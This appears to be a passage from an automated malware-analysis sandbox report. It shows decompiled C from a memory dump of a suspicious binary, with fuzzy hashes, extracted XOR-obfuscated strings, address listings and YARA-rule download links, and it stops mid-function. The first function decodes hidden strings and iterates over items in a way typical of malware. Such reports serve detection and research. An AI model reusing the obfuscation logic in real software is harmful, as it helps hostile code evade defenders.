Opcode Fuzzy Hash: 4781b235fb9b1a99fc68fa3f94fd44aafa459b44210b2cd417a3513cc1cfc600
Instruction Fuzzy Hash: 4E713931A60222FADB29AFB4EC45BB773A8EF54310F504425F905DB181EA76D978CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001D78B7, Relevance: 11.1, APIs: 1, Strings: 5, Instructions: 559
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E001D78B7(void* __ebx, void* __ecx, void* __eflags) {
				void* __edi;
				void* __esi;
				intOrPtr _t322;
				signed int _t342;
				signed int _t346;
				void* _t348;
				intOrPtr _t349;
				intOrPtr _t354;
				intOrPtr _t356;
				signed int _t363;
				signed int _t366;
				void* _t373;
				void* _t377;
				void* _t378;
				intOrPtr _t383;
				void* _t392;
				signed int _t394;
				signed int _t395;
				void* _t398;
				void* _t403;
				void* _t410;
				void* _t412;
				void* _t417;
				signed int _t430;
				signed int _t432;
				signed int _t434;
				void* _t438;
				intOrPtr _t458;
				signed int _t467;
				void* _t470;
				intOrPtr _t504;
				void* _t507;
				intOrPtr _t518;
				intOrPtr _t542;
				signed char _t544;
				signed int _t546;
				char _t548;
				char _t549;
				char _t550;
				intOrPtr* _t552;
				signed char _t554;
				intOrPtr* _t558;
				intOrPtr _t560;
				void* _t568;
				signed int _t577;
				signed int _t579;
				signed int _t581;
				intOrPtr _t582;
				signed int _t584;
				signed int _t585;
				signed int _t586;
				signed int _t588;
				signed int _t589;
				signed int _t591;
				signed int _t593;
				intOrPtr _t596;
				intOrPtr* _t597;
				void* _t598;
				void* _t600;

				_t444 = __ebx;
				L002277AF(0x228b1d, __ebx, 8);
				_push(__ecx);
				_push(__ebx);
				_push(__ebx);
				_t544 = 0x49;
				_t577 = 0;
				 *((intOrPtr*)(_t598 - 0x10)) = _t600 - 0x1b8;
				 *(_t598 - 0x24) = 0;
				_t588 = 0;
				 *((intOrPtr*)(_t598 - 4)) = 0;
				 *((intOrPtr*)(_t598 - 0x49)) = 0x25281e49;
				 *((intOrPtr*)(_t598 - 0x45)) = 0x3a3d2c25;
				 *((char*)(_t598 - 0x41)) = 0;
				while(1) {
					 *(_t598 + _t588 - 0x48) = _t544 ^  *(_t598 + _t588 - 0x48);
					_t588 = _t588 + 1;
					if(_t588 >= 7) {
						break;
					}
					_t544 =  *((intOrPtr*)(_t598 - 0x49));
				}
				 *((char*)(_t598 - 0x41)) = 0;
				 *((intOrPtr*)(_t598 - 0x55)) = 0x59506935;
				_t546 = 0;
				 *((intOrPtr*)(_t598 - 0x51)) = 0x47415650;
				 *((char*)(_t598 - 0x4d)) = 0;
				while(1) {
					 *(_t598 + _t546 - 0x54) =  *(_t598 + _t546 - 0x54) ^  *(_t598 + _t546 - 0x54);
					_t546 = _t546 + 1;
					__eflags = _t546 - 7;
					if(_t546 >= 7) {
						break;
					}
				}
				__eflags =  *0x2480a4 - 0x10;
				 *((char*)(_t598 - 0x4d)) = 0;
				_t320 =  >=  ?  *0x248090 : 0x248090;
				_t322 = L001F57CC(E00206A2E(_t444, _t577, _t588,  *0x2480a4 - 0x10,  >=  ?  *0x248090 : 0x248090), _t598 - 0x54);
				__eflags = 0;
				 *((intOrPtr*)(_t598 - 0xdc)) = _t322;
				 *((intOrPtr*)(_t598 - 0x5d)) = 0xc01006f;
				 *((intOrPtr*)(_t598 - 0x59)) = 0x71c0e;
				_t548 = 0;
				while(1) {
					 *(_t598 + _t548 - 0x5c) =  *(_t598 + _t548 - 0x5c) ^  *(_t598 + _t548 - 0x5c);
					_t548 = _t548 + 1;
					__eflags = _t548 - 6;
					if(_t548 >= 6) {
						break;
					}
				}
				 *((intOrPtr*)(_t598 - 0x180)) = 0;
				 *((char*)(_t598 - 0x56)) = 0;
				 *((intOrPtr*)(_t598 - 0x170)) = 0;
				 *((char*)(_t598 - 0x180)) = 0;
				 *((intOrPtr*)(_t598 - 0x16c)) = 0xf;
				L001D2F8E(_t598 - 0x5c);
				__eflags = 0;
				 *((char*)(_t598 - 4)) = 1;
				 *((intOrPtr*)(_t598 - 0x28)) = 0x657d08;
				_t549 = 0;
				while(1) {
					 *(_t598 + _t549 - 0x27) =  *(_t598 + _t549 - 0x27) ^  *(_t598 + _t549 - 0x27);
					_t549 = _t549 + 1;
					__eflags = _t549 - 2;
					if(_t549 >= 2) {
						break;
					}
				}
				 *((intOrPtr*)(_t598 - 0x168)) = 0;
				 *((char*)(_t598 - 0x25)) = 0;
				 *((intOrPtr*)(_t598 - 0x158)) = 0;
				 *((char*)(_t598 - 0x168)) = 0;
				 *((intOrPtr*)(_t598 - 0x154)) = 0xf;
				L001D2F8E(_t598 - 0x27);
				 *((char*)(_t598 - 4)) = 2;
				__eflags = 0;
				 *((intOrPtr*)(_t598 - 0x65)) = 0x2e6e7603;
				 *((intOrPtr*)(_t598 - 0x61)) = 0x40574f;
				_t550 = 0;
				while(1) {
					 *(_t598 + _t550 - 0x64) =  *(_t598 + _t550 - 0x64) ^  *(_t598 + _t550 - 0x64);
					_t550 = _t550 + 1;
					__eflags = _t550 - 6;
					if(_t550 >= 6) {
						break;
					}
				}
				 *((intOrPtr*)(_t598 - 0x150)) = 0;
				 *((char*)(_t598 - 0x5e)) = 0;
				 *((intOrPtr*)(_t598 - 0x140)) = 0;
				 *((char*)(_t598 - 0x150)) = 0;
				 *((intOrPtr*)(_t598 - 0x13c)) = 0xf;
				L001D2F8E(_t598 - 0x64);
				_push( *((intOrPtr*)(_t598 - 0x94)));
				 *((char*)(_t598 - 4)) = 3;
				 *((intOrPtr*)(_t598 - 0xac)) = 0;
				 *((intOrPtr*)(_t598 - 0xa8)) = 0;
				 *((intOrPtr*)(_t598 - 0xa4)) = 0;
				_push(_t598 - 0x138);
				_push(_t598 - 0x180);
				E001D3F03(_t598 - 0xac);
				_push("�*");
				_push(3);
				_t342 = 0x18;
				_push(_t342);
				 *(_t598 - 0x8c) = _t342;
				_push(_t598 - 0x180);
				 *((char*)(_t598 - 4)) = 5;
				E002001E8(_t444, _t577, _t588, __eflags);
				_t589 = 0;
				__eflags = 0;
				while(1) {
					_t458 =  *((intOrPtr*)(_t598 - 0xac));
					_t346 =  *((intOrPtr*)(_t598 - 0xa8)) - _t458;
					asm("cdq");
					 *(_t598 - 0xa0) = _t589;
					__eflags = _t589 - _t346 /  *(_t598 - 0x8c);
					if(_t589 >= _t346 /  *(_t598 - 0x8c)) {
						break;
					}
					_t591 = _t589 * 0x18;
					_t552 = _t458 + _t591;
					__eflags =  *((intOrPtr*)(_t552 + 0x14)) - 0x10;
					if( *((intOrPtr*)(_t552 + 0x14)) >= 0x10) {
						_t552 =  *_t552;
					}
					_t349 = L001F57CC( *((intOrPtr*)(_t598 - 0xdc)), _t552);
					 *((char*)(_t598 - 0xd8)) = 0;
					_push( *((intOrPtr*)(_t598 - 0xd8)));
					 *((intOrPtr*)(_t598 - 0x88)) = _t349;
					 *((intOrPtr*)(_t598 - 0x7c)) = _t349;
					E001D4BA2(_t598 - 0x7c);
					 *((char*)(_t598 - 4)) = 6;
					 *((char*)(_t598 - 0x19)) = E001CB2CE(_t598 - 0x40);
					 *((char*)(_t598 - 4)) = 5;
					E001D2D4F(_t598 - 0x40);
					__eflags =  *((char*)(_t598 - 0x19));
					if( *((char*)(_t598 - 0x19)) != 0) {
						_t554 = 0x26;
						 *((intOrPtr*)(_t598 - 0x76)) = 0x47517a26;
						 *((intOrPtr*)(_t598 - 0x72)) = 0x52434a4a;
						_t467 = 0;
						__eflags = 0;
						 *((short*)(_t598 - 0x6e)) = 0x55;
						while(1) {
							 *(_t598 + _t467 - 0x75) =  *(_t598 + _t467 - 0x75) ^ _t554;
							_t467 = _t467 + 1;
							__eflags = _t467 - 8;
							if(_t467 >= 8) {
								break;
							}
							_t109 = _t598 - 0x76; // 0x47517a26
							_t554 =  *_t109;
						}
						 *((char*)(_t598 - 0x6d)) = 0;
						_t354 = L001F57CC( *((intOrPtr*)(_t598 - 0x88)), _t598 - 0x75);
						 *((intOrPtr*)(_t598 - 0x84)) = _t354;
						 *((intOrPtr*)(_t598 - 0x80)) = _t354;
						_t470 = L001F57CC(_t598 - 0x48, _t598 - 0x54);
						_t558 =  *((intOrPtr*)(_t598 - 0xac)) + _t591;
						__eflags =  *((intOrPtr*)(_t558 + 0x14)) - 0x10;
						if( *((intOrPtr*)(_t558 + 0x14)) >= 0x10) {
							_t558 =  *_t558;
						}
						_t356 = L001F57CC(_t470, _t558);
						 *((char*)(_t598 - 0xd4)) = 0;
						_push( *((intOrPtr*)(_t598 - 0xd4)));
						 *((intOrPtr*)(_t598 - 0x6c)) = _t356;
						 *((intOrPtr*)(_t598 - 0x9c)) = _t356;
						E001D4BA2(_t598 - 0x7c);
						 *((char*)(_t598 - 4)) = 7;
						E001CAF03(_t444, _t598 - 0xd0, _t577, __eflags, _t598 - 0x40);
						E001D2D4F(_t598 - 0x40);
						E001CBF31(_t598 - 0xb8, _t598 - 0xd0);
						_t363 =  *(_t598 - 0xb8);
						_t593 =  *(_t598 - 0xb4);
						 *(_t598 - 0xb8) =  *(_t598 - 0xb8) & 0x00000000;
						 *(_t598 - 0xb4) =  *(_t598 - 0xb4) & 0x00000000;
						 *(_t598 - 0x20) = _t363;
						 *(_t598 - 0xc0) = _t363;
						 *(_t598 - 0xbc) = _t593;
						E001CBF31(_t598 - 0x120, _t598 - 0xd0);
						_t477 =  *(_t598 - 0x11c);
						_t560 = 0;
						asm("xorps xmm0, xmm0");
						 *((intOrPtr*)(_t598 - 0x98)) = 0;
						asm("movlpd [ebp-0xfc], xmm0");
						 *(_t598 - 0xfc) =  *(_t598 - 0xfc) & 0x00000000;
						 *(_t598 - 0xf8) =  *(_t598 - 0xf8) & 0;
						__eflags =  *(_t598 - 0x11c);
						if( *(_t598 - 0x11c) != 0) {
							E001C9597(_t477);
							_t560 =  *((intOrPtr*)(_t598 - 0x98));
						}
						_t366 =  *(_t598 - 0x20);
						while(1) {
							__eflags = _t366 - _t560;
							if(_t366 == _t560) {
								break;
							}
							 *((char*)(_t598 - 4)) = 0xc;
							_t568 = 0;
							asm("movaps xmm0, [0x23d780]");
							asm("movups [ebp-0x38], xmm0");
							do {
								 *(_t598 + _t568 - 0x37) =  *(_t598 + _t568 - 0x37) ^  *(_t598 - 0x38);
								_t568 = _t568 + 1;
								__eflags = _t568 - 0xe;
							} while (_t568 < 0xe);
							_t596 =  *(_t598 - 0x20) + 0x20;
							 *((char*)(_t598 - 0x29)) = 0;
							_t504 = _t596;
							 *((intOrPtr*)(_t598 - 0x90)) = _t596;
							_t392 = E001CA1C2(_t504, _t598 - 0xf4);
							_push(_t504);
							 *((char*)(_t598 - 4)) = 0xd;
							_t579 = _t577 | 0x00000001;
							 *(_t598 - 0x24) = _t579;
							E001D3654(_t392, _t598 - 0x114);
							 *((intOrPtr*)(_t598 - 4)) = 0xe;
							_t581 = _t579 | 0x82;
							_t507 = _t598 - 0x114;
							 *(_t598 - 0x20) = _t581;
							 *(_t598 - 0x24) = _t581;
							_t394 = E001D3D6E(_t507, _t598 - 0x37, _t581, _t596);
							__eflags = _t394;
							if(_t394 == 0) {
								L33:
								 *((char*)(_t598 - 0x19)) = 0;
							} else {
								_push(_t507);
								_t542 = _t596;
								E001D3654(_t542, _t598 - 0x138);
								_push(_t542);
								_t586 = _t581 | 0x00000404;
								 *(_t598 - 0x20) = _t586;
								 *(_t598 - 0x24) = _t586;
								_t438 = E001D237C(_t598 - 0x138,  *((intOrPtr*)(_t598 - 0x84)));
								 *((char*)(_t598 - 0x19)) = 1;
								__eflags = _t438 - 0xffffffff;
								if(_t438 != 0xffffffff) {
									goto L33;
								}
							}
							_t395 =  *(_t598 - 0x20);
							__eflags = _t395 & 0x00000004;
							if((_t395 & 0x00000004) != 0) {
								_t434 = _t395 & 0xfffffffb;
								__eflags = _t434;
								 *(_t598 - 0x20) = _t434;
								 *(_t598 - 0x24) = _t434;
								E001D2F2D(_t598 - 0x138);
								_t395 =  *(_t598 - 0x20);
							}
							__eflags = _t395 & 0x00000002;
							if((_t395 & 0x00000002) != 0) {
								_t432 = _t395 & 0xfffffffd;
								__eflags = _t432;
								 *(_t598 - 0x20) = _t432;
								 *(_t598 - 0x24) = _t432;
								E001D2F2D(_t598 - 0x114);
								_t395 =  *(_t598 - 0x20);
							}
							 *((intOrPtr*)(_t598 - 4)) = 0xc;
							__eflags = _t395 & 0x00000001;
							if((_t395 & 0x00000001) != 0) {
								_t430 = _t395 & 0xfffffffe;
								__eflags = _t430;
								 *(_t598 - 0x20) = _t430;
								 *(_t598 - 0x24) = _t430;
								E001D2D4F(_t598 - 0xf4);
							}
							__eflags =  *((char*)(_t598 - 0x19));
							if(__eflags == 0) {
								_t577 =  *(_t598 - 0x20);
							} else {
								_t398 = L001F57CC(E001F5C6D(), _t598 - 0x48);
								 *(_t598 - 0x40) =  *(_t598 - 0x40) & 0x00000000;
								 *(_t598 - 0x30) =  *(_t598 - 0x30) & 0x00000000;
								_t582 = 0xf;
								 *((intOrPtr*)(_t598 - 0x2c)) = _t582;
								L001D2F8E(_t398);
								E001CB7F6(_t598 - 0x40);
								E001D2F2D(_t598 - 0x40);
								_t403 = L001F57CC(E001F5C6D(),  *((intOrPtr*)(_t598 - 0x6c)));
								 *(_t598 - 0x40) =  *(_t598 - 0x40) & 0x00000000;
								 *(_t598 - 0x30) =  *(_t598 - 0x30) & 0x00000000;
								 *((intOrPtr*)(_t598 - 0x2c)) = _t582;
								L001D2F8E(_t403);
								E001CB7F6(_t598 - 0x40);
								E001D2F2D(_t598 - 0x40);
								 *((char*)(_t598 - 0x4a)) = 0;
								 *((char*)(_t598 - 0x4c)) = 0x73;
								 *((char*)(_t598 - 0x4a)) = 0;
								 *((char*)(_t598 - 0x4b)) = 0x2c;
								_t518 = _t596;
								_t410 = E001CA1C2(_t518, _t598 - 0x1c8);
								_push(_t518);
								 *((char*)(_t598 - 4)) = 0xf;
								E001D3654(_t410, _t598 - 0xf4);
								_t584 =  *(_t598 - 0x20) | 0x00002000;
								 *(_t598 - 0x24) = _t584;
								_push(0x247f70);
								 *((char*)(_t598 - 4)) = 0x10;
								_t412 = E001DC25D(_t444, _t598 - 0x1b0,  *((intOrPtr*)(_t598 - 0x6c)));
								 *((char*)(_t598 - 4)) = 0x11;
								_push(_t598 - 0xf4);
								E001DC4A7(_t598 - 0x138, _t596,  *((intOrPtr*)(_t598 - 0x94)), _t412);
								_t585 = _t584 | 0x00010000;
								 *(_t598 - 0x24) = _t585;
								 *((char*)(_t598 - 4)) = 0x12;
								_t597 = E001DC2EA(_t598 - 0x198, _t598 - 0x138, _t598 - 0x4b);
								 *((char*)(_t598 - 4)) = 0x13;
								__eflags =  *((intOrPtr*)(_t597 + 0x14)) - 0x10;
								if( *((intOrPtr*)(_t597 + 0x14)) >= 0x10) {
									_t597 =  *_t597;
								}
								_t417 = L001F57CC(E001F5C6D(), _t597);
								 *((intOrPtr*)(_t598 - 0x2c)) = 0xf;
								 *(_t598 - 0x40) = 0;
								 *(_t598 - 0x30) = 0;
								 *(_t598 - 0x40) = 0;
								L001D2F8E(_t417);
								_push(_t598 - 0x40);
								 *((char*)(_t598 - 4)) = 0x14;
								E001D3654( *((intOrPtr*)(_t598 - 0x90)), _t598 - 0x114);
								_t577 = _t585 | 0x00020000;
								 *(_t598 - 0x24) = _t577;
								E001D5505(_t598 - 0x114, _t598 - 0x40);
								E001D2F2D(_t598 - 0x114);
								E001D2F2D(_t598 - 0x40);
								E001D2F2D(_t598 - 0x198);
								E001D2F2D(_t598 - 0x138);
								E001D2F2D(_t598 - 0x1b0);
								E001D2F2D(_t598 - 0xf4);
								E001D2D4F(_t598 - 0x1c8);
							}
							 *((intOrPtr*)(_t598 - 4)) = 0xb;
							E001CAF48(_t444, _t598 - 0xc0, __eflags);
							_t366 =  *(_t598 - 0xc0);
							_t593 =  *(_t598 - 0xbc);
							_t560 =  *((intOrPtr*)(_t598 - 0x98));
							 *(_t598 - 0x20) = _t366;
						}
						__eflags = _t593;
						if(_t593 != 0) {
							E001C9597(_t593);
						}
						_t478 =  *(_t598 - 0xcc);
						__eflags =  *(_t598 - 0xcc);
						if( *(_t598 - 0xcc) != 0) {
							E001C9597(_t478);
						}
						 *((char*)(_t598 - 0xc8)) = 0;
						_push( *((intOrPtr*)(_t598 - 0xc8)));
						 *((char*)(_t598 - 4)) = 0x16;
						E001D4BA2(_t598 - 0x80);
						 *((char*)(_t598 - 4)) = 0x17;
						 *((char*)(_t598 - 0x19)) = E001CB2CE(_t598 - 0xf4);
						 *((char*)(_t598 - 4)) = 0x16;
						E001D2D4F(_t598 - 0xf4);
						__eflags =  *((char*)(_t598 - 0x19));
						if( *((char*)(_t598 - 0x19)) == 0) {
							_t594 =  *((intOrPtr*)(_t598 - 0x6c));
						} else {
							_t373 = L001F57CC(E001F5C6D(), _t598 - 0x48);
							 *(_t598 - 0x40) =  *(_t598 - 0x40) & 0x00000000;
							 *(_t598 - 0x30) =  *(_t598 - 0x30) & 0x00000000;
							 *((intOrPtr*)(_t598 - 0x2c)) = 0xf;
							L001D2F8E(_t373);
							E001CB7F6(_t598 - 0x40);
							E001D2F2D(_t598 - 0x40);
							_t377 = E001F5C6D();
							_t594 =  *((intOrPtr*)(_t598 - 0x6c));
							_t378 = L001F57CC(_t377,  *((intOrPtr*)(_t598 - 0x6c)));
							 *(_t598 - 0x40) =  *(_t598 - 0x40) & 0x00000000;
							 *(_t598 - 0x30) =  *(_t598 - 0x30) & 0x00000000;
							 *((intOrPtr*)(_t598 - 0x2c)) = 0xf;
							L001D2F8E(_t378);
							E001CB7F6(_t598 - 0x40);
							E001D2F2D(_t598 - 0x40);
							_t383 = L001F57CC(E001F5C6D(),  *((intOrPtr*)(_t598 - 0x6c)));
							 *((char*)(_t598 - 0xc4)) = 0;
							_push( *((intOrPtr*)(_t598 - 0xc4)));
							 *((intOrPtr*)(_t598 - 0x90)) = _t383;
							E001D4BA2(_t598 - 0x90);
							 *((char*)(_t598 - 0x94)) = 0;
							_push( *((intOrPtr*)(_t598 - 0x94)));
							 *((char*)(_t598 - 4)) = 0x18;
							E001D4BA2(_t598 - 0x80);
							_push(0x12);
							 *((char*)(_t598 - 4)) = 0x19;
							L001CB766(_t444, _t598 - 0xf4, _t598 - 0x114, __eflags);
							E001D2D4F(_t598 - 0xf4);
							E001D2D4F(_t598 - 0x114);
						}
						 *((intOrPtr*)(_t598 - 4)) = 5;
						E00205A55(_t594);
						E00205A55( *((intOrPtr*)(_t598 - 0x84)));
					}
					E00205A55( *((intOrPtr*)(_t598 - 0x88)));
					_t589 =  *(_t598 - 0xa0) + 1;
				}
				_t348 = E001D2CDA();
				 *[fs:0x0] =  *((intOrPtr*)(_t598 - 0xc));
				return _t348;
			}

0x001d78b7
0x001d78be
0x001d78c3
0x001d78c4
0x001d78cb
0x001d78ce
0x001d78d2
0x001d78d4
0x001d78d7
0x001d78da
0x001d78dc
0x001d78df
0x001d78e6
0x001d78ed
0x001d78f0
0x001d78f6
0x001d78fa
0x001d78fe
0x00000000
0x00000000
0x001d7900
0x001d7900
0x001d7905
0x001d790a
0x001d7911
0x001d7913
0x001d791a
0x001d791d
0x001d7923
0x001d7927
0x001d7928
0x001d792b
0x00000000
0x00000000
0x001d792d
0x001d7932
0x001d793e
0x001d7941
0x001d7954
0x001d7959
0x001d795b
0x001d7963
0x001d796a
0x001d7971
0x001d7973
0x001d7979
0x001d797d
0x001d797e
0x001d7981
0x00000000
0x00000000
0x001d7983
0x001d7988
0x001d7991
0x001d7994
0x001d799a
0x001d79a7
0x001d79b1
0x001d79b6
0x001d79b8
0x001d79be
0x001d79c5
0x001d79c7
0x001d79cd
0x001d79d1
0x001d79d2
0x001d79d5
0x00000000
0x00000000
0x001d79d7
0x001d79dc
0x001d79e5
0x001d79e8
0x001d79ee
0x001d79fb
0x001d7a05
0x001d7a0a
0x001d7a0e
0x001d7a12
0x001d7a19
0x001d7a20
0x001d7a22
0x001d7a28
0x001d7a2c
0x001d7a2d
0x001d7a30
0x00000000
0x00000000
0x001d7a32
0x001d7a37
0x001d7a40
0x001d7a43
0x001d7a49
0x001d7a56
0x001d7a60
0x001d7a65
0x001d7a6d
0x001d7a71
0x001d7a7d
0x001d7a83
0x001d7a8f
0x001d7a96
0x001d7a97
0x001d7a9c
0x001d7aa1
0x001d7aa5
0x001d7aa6
0x001d7aa7
0x001d7ab3
0x001d7ab4
0x001d7ab8
0x001d7abd
0x001d7abd
0x001d7abf
0x001d7ac5
0x001d7acb
0x001d7acd
0x001d7ad4
0x001d7ada
0x001d7adc
0x00000000
0x00000000
0x001d7ae2
0x001d7ae5
0x001d7ae8
0x001d7aec
0x001d7aee
0x001d7aee
0x001d7af6
0x001d7afb
0x001d7b05
0x001d7b0e
0x001d7b14
0x001d7b17
0x001d7b20
0x001d7b2c
0x001d7b2f
0x001d7b33
0x001d7b38
0x001d7b3c
0x001d7b42
0x001d7b44
0x001d7b4b
0x001d7b52
0x001d7b52
0x001d7b54
0x001d7b5a
0x001d7b5a
0x001d7b5e
0x001d7b5f
0x001d7b62
0x00000000
0x00000000
0x001d7b64
0x001d7b64
0x001d7b64
0x001d7b72
0x001d7b76
0x001d7b7e
0x001d7b87
0x001d7b95
0x001d7b97
0x001d7b99
0x001d7b9d
0x001d7b9f
0x001d7b9f
0x001d7ba1
0x001d7ba6
0x001d7bb0
0x001d7bb9
0x001d7bbc
0x001d7bc2
0x001d7bcb
0x001d7bd6
0x001d7bde
0x001d7bf0
0x001d7bf5
0x001d7bfb
0x001d7c01
0x001d7c08
0x001d7c0f
0x001d7c12
0x001d7c18
0x001d7c2b
0x001d7c30
0x001d7c36
0x001d7c38
0x001d7c3b
0x001d7c41
0x001d7c49
0x001d7c50
0x001d7c56
0x001d7c58
0x001d7c5a
0x001d7c5f
0x001d7c5f
0x001d7c65
0x001d7c68
0x001d7c68
0x001d7c6a
0x00000000
0x00000000
0x001d7c70
0x001d7c74
0x001d7c76
0x001d7c7d
0x001d7c81
0x001d7c84
0x001d7c88
0x001d7c89
0x001d7c89
0x001d7c97
0x001d7c9a
0x001d7c9f
0x001d7ca1
0x001d7ca7
0x001d7cac
0x001d7cb3
0x001d7cb8
0x001d7cbd
0x001d7cc0
0x001d7ccb
0x001d7cd5
0x001d7cd8
0x001d7cde
0x001d7ce1
0x001d7ce4
0x001d7ce9
0x001d7ceb
0x001d7d23
0x001d7d23
0x001d7ced
0x001d7ced
0x001d7cf4
0x001d7cf7
0x001d7cfc
0x001d7d03
0x001d7d0f
0x001d7d12
0x001d7d15
0x001d7d1a
0x001d7d1e
0x001d7d21
0x00000000
0x00000000
0x001d7d21
0x001d7d27
0x001d7d2a
0x001d7d2c
0x001d7d2e
0x001d7d2e
0x001d7d37
0x001d7d3a
0x001d7d3d
0x001d7d42
0x001d7d42
0x001d7d45
0x001d7d47
0x001d7d49
0x001d7d49
0x001d7d52
0x001d7d55
0x001d7d58
0x001d7d5d
0x001d7d5d
0x001d7d60
0x001d7d67
0x001d7d69
0x001d7d6b
0x001d7d6b
0x001d7d74
0x001d7d77
0x001d7d7a
0x001d7d7a
0x001d7d7f
0x001d7d83
0x001d7f3e
0x001d7d89
0x001d7d93
0x001d7d98
0x001d7d9f
0x001d7da5
0x001d7da7
0x001d7daa
0x001d7db2
0x001d7dba
0x001d7dc9
0x001d7dce
0x001d7dd5
0x001d7dda
0x001d7ddd
0x001d7de5
0x001d7ded
0x001d7df4
0x001d7dfa
0x001d7dff
0x001d7e03
0x001d7e06
0x001d7e0f
0x001d7e14
0x001d7e1b
0x001d7e22
0x001d7e2a
0x001d7e30
0x001d7e3c
0x001d7e41
0x001d7e45
0x001d7e51
0x001d7e55
0x001d7e63
0x001d7e68
0x001d7e6e
0x001d7e74
0x001d7e8b
0x001d7e8d
0x001d7e91
0x001d7e95
0x001d7e97
0x001d7e97
0x001d7ea2
0x001d7ea9
0x001d7eb3
0x001d7eb9
0x001d7ebc
0x001d7ebf
0x001d7ec4
0x001d7ecb
0x001d7ed6
0x001d7edb
0x001d7eea
0x001d7eed
0x001d7ef8
0x001d7f00
0x001d7f0b
0x001d7f16
0x001d7f21
0x001d7f2c
0x001d7f37
0x001d7f37
0x001d7f41
0x001d7f8b
0x001d7f90
0x001d7f96
0x001d7f9c
0x001d7fa2
0x001d7fa2
0x001d7faa
0x001d7fac
0x001d7fb0
0x001d7fb0
0x001d7fb5
0x001d7fbb
0x001d7fbd
0x001d7fbf
0x001d7fbf
0x001d7fc4
0x001d7fce
0x001d7fda
0x001d7fde
0x001d7fea
0x001d7ff9
0x001d7ffc
0x001d8000
0x001d8005
0x001d8009
0x001d8102
0x001d800f
0x001d8019
0x001d801e
0x001d8025
0x001d802a
0x001d8031
0x001d8039
0x001d8041
0x001d8046
0x001d804b
0x001d8052
0x001d8057
0x001d805e
0x001d8063
0x001d806a
0x001d8072
0x001d807a
0x001d8088
0x001d808d
0x001d809a
0x001d80a6
0x001d80ac
0x001d80b2
0x001d80bc
0x001d80c8
0x001d80cc
0x001d80d2
0x001d80da
0x001d80e4
0x001d80f0
0x001d80fb
0x001d80fb
0x001d8105
0x001d8147
0x001d8153
0x001d8158
0x001d815f
0x001d816b
0x001d816b
0x001d8177
0x001d818e
0x001d819d

APIs

__EH_prolog2.LIBCMT ref: 001D78BE

Part of subcall function 001D3F03: __EH_prolog.LIBCMT ref: 001D3F08

Strings

&zQGJJCRU, xrefs: 001D7B64
*, xrefs: 001D7A9C
%,=:, xrefs: 001D78E6
o, xrefs: 001D7963
5iPYPVAG, xrefs: 001D792D

Memory Dump Source

Source File: 00000000.00000002.312704273.00000000001C1000.00000020.00020000.sdmp, Offset: 001C0000, based on PE: true

Associated: 00000000.00000002.312694466.00000000001C0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312779115.000000000022D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.312799961.0000000000247000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312807733.000000000024D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.312835381.0000000000273000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.312842602.0000000000279000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.313844348.00000000008F6000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: H_prologH_prolog2
String ID: %,=:$&zQGJJCRU$5iPYPVAG$o$*
API String ID: 1160199830-112732108
Opcode ID: 103413632079edd5212e6573ba1eb81ca53408a769044f8b8de2795f852b8806
Instruction ID: d27895dd113e92783b1194f356934a1b26bf09f324433ff34ed6844436a76d0f
Opcode Fuzzy Hash: 103413632079edd5212e6573ba1eb81ca53408a769044f8b8de2795f852b8806
Instruction Fuzzy Hash: DC425971D0426CCEDF29DBA4C891BEDBBB1AF29300F14419AE41977282DB741A89CF61

Uniqueness

Uniqueness Score: -1.00%

Function 00222CF2, Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 183
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00222CF2(void* __ecx, void* __edx, void* __eflags, signed short _a4, short* _a8, short* _a12) {
				signed int _v8;
				int _v12;
				int _v16;
				char _v20;
				signed short* _v24;
				short* _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t39;
				void* _t45;
				signed short* _t46;
				signed short _t47;
				short* _t48;
				int _t49;
				void* _t53;
				short* _t55;
				short* _t56;
				short* _t57;
				int _t64;
				int _t66;
				short* _t70;
				intOrPtr _t73;
				void* _t75;
				short* _t76;
				intOrPtr _t83;
				short* _t86;
				short* _t89;
				short** _t99;
				short* _t100;
				signed short _t101;
				signed int _t104;
				void* _t105;

				_t39 =  *0x247050; // 0xc1fc8d92
				_v8 = _t39 ^ _t104;
				_t86 = _a12;
				_t101 = _a4;
				_v28 = _a8;
				_v24 = E002171CB(__ecx, __edx) + 0x50;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_t45 = E002171CB(__ecx, __edx);
				_t97 = 0;
				 *((intOrPtr*)(_t45 + 0x34c)) =  &_v20;
				_t89 = _t101 + 0x80;
				_t46 = _v24;
				 *_t46 = _t101;
				_t99 =  &(_t46[2]);
				 *_t99 = _t89;
				if(_t89 != 0 &&  *_t89 != 0) {
					_t83 =  *0x23262c; // 0x17
					E00222C91(_t89, 0, 0x232518, _t83 - 1, _t99);
					_t46 = _v24;
					_t105 = _t105 + 0xc;
					_t97 = 0;
				}
				_v20 = _t97;
				_t47 =  *_t46;
				if(_t47 == 0 ||  *_t47 == _t97) {
					_t48 =  *_t99;
					__eflags = _t48;
					if(_t48 == 0) {
						L19:
						_v20 = 0x104;
						_t49 = GetUserDefaultLCID();
						_v12 = _t49;
						_v16 = _t49;
						goto L20;
					}
					__eflags =  *_t48 - _t97;
					if(__eflags == 0) {
						goto L19;
					}
					E00222633(_t89, _t97, __eflags,  &_v20);
					_pop(_t89);
					goto L20;
				} else {
					_t70 =  *_t99;
					if(_t70 == 0) {
						L8:
						E00222719(_t89, _t97, __eflags,  &_v20);
						L9:
						_pop(_t89);
						if(_v20 != 0) {
							_t100 = 0;
							__eflags = 0;
							L25:
							asm("sbb esi, esi");
							_t101 = E00222B1D(_t89,  ~_t101 & _t101 + 0x00000100,  &_v20);
							__eflags = _t101;
							if(_t101 == 0) {
								L22:
								_t53 = 0;
								L23:
								return L002007E2(_t53, _t86, _v8 ^ _t104, _t97, _t100, _t101);
							}
							_t55 = IsValidCodePage(_t101 & 0x0000ffff);
							__eflags = _t55;
							if(_t55 == 0) {
								goto L22;
							}
							_t56 = IsValidLocale(_v16, 1);
							__eflags = _t56;
							if(_t56 == 0) {
								goto L22;
							}
							_t57 = _v28;
							__eflags = _t57;
							if(_t57 != 0) {
